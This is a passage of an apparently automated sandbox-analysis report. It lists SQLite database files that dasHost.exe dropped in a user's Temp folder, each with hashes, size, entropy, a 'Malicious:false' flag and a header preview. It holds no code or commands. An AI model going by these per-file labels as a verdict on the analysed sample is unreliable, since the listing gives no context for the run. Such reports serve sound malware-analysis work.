                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\qMdg1zR85j

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                        Category:dropped
                                                                        Size (bytes):28672
                                                                        Entropy (8bit):2.5793180405395284
                                                                        Encrypted:false
                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\qV1iS9V2SI

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\qaonq0bCcr

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\qlTDMiLEXh

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\qrMvavDJGt

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\qtgCnXZFUk

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\rGzuxaS4q9

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\rXHPt5TMyF

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\rcKDe3VpNw

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\rchOzVZDHx

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\sIn7rmPjvc

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\snobSeSIfu

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):40960
                                                                        Entropy (8bit):0.8553638852307782
                                                                        Encrypted:false
                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\svpvNflg9W

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\t68Zy0vibe

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\tqz6LUu0zp

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\txW8sm8wen

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                        Category:dropped
                                                                        Size (bytes):49152
                                                                        Entropy (8bit):0.8180424350137764
                                                                        Encrypted:false
                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\uTCwbEJly5

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):106496
                                                                        Entropy (8bit):1.1358696453229276
                                                                        Encrypted:false
                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\uVwIDRaWrw

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\ua4yUhAVZh

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\uwxUYCseas

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                        Category:dropped
                                                                        Size (bytes):114688
                                                                        Entropy (8bit):0.9746603542602881
                                                                        Encrypted:false
                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\v5LRl5oK3a

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\v7PTXdpZEe

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5712781801655107
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:05A60B4620923FD5D53B9204391452AF
                                                                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                        Malicious:false
                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\Users\user\AppData\Local\Temp\vEoqwbVJfM

                                                                        Download File
                                                                        Process:C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):20480
                                                                        Entropy (8bit):0.5707520969659783
                                                                        Encrypted:false
                                                                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
